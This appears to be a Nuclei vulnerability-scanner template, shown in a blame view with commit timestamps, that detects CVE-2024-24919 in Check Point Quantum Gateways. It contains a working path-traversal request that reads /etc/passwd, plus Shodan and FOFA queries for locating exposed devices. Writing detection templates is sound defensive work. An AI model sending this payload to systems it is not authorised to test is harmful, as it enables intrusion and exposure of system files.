nuclei-templates/http/cves/2024/CVE-2024-24919.yaml

45 lines
1.4 KiB
YAML
Raw Permalink Normal View History

2024-05-30 03:36:42 +00:00
id: CVE-2024-24919
info:
2024-05-30 11:17:43 +00:00
name: Check Point Quantum Gateway - Information Disclosure
2024-05-30 03:36:42 +00:00
author: johnk3r
2024-05-30 03:48:57 +00:00
severity: high
description: |
CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade.
2024-05-30 03:48:57 +00:00
reference:
- https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
2024-05-30 04:33:41 +00:00
- https://support.checkpoint.com/results/sk/sk182337
2024-05-30 03:36:42 +00:00
metadata:
2024-06-04 07:03:25 +00:00
verified: true
2024-05-30 03:36:42 +00:00
max-request: 1
vendor: checkpoint
2024-05-30 09:39:10 +00:00
product: quantum_security_gateway
2024-06-04 07:03:25 +00:00
shodan-query:
- html:"Check Point SSL Network"
- http.html:"check point ssl network"
fofa-query: body="check point ssl network"
2024-05-31 19:23:20 +00:00
cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:*
2024-05-30 09:39:10 +00:00
tags: cve,cve2024,checkpoint,lfi
2024-05-30 03:36:42 +00:00
http:
2024-05-30 04:52:03 +00:00
- raw:
- |
POST /clients/MyCRL HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip
2024-05-30 03:36:42 +00:00
2024-06-12 05:39:52 +00:00
aCSHELL/../../../../../../../etc/passwd
2024-06-04 07:03:25 +00:00
2024-05-30 03:36:42 +00:00
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*"
- "nobody:.*"
2024-05-30 08:52:10 +00:00
condition: and
2024-05-30 03:36:42 +00:00
- type: status
status:
2024-05-30 11:17:43 +00:00
- 200
# digest: 4a0a004730450221009afc265207776c9f9b1141fe6d3ee1d95636a46c187f30031ad4d91454e24c80022074c76d77fa0af466c7c78777681ecec941e3bd46946c9604f7e24a476aa1617e:922c64590222798bb761d5b6d8e72950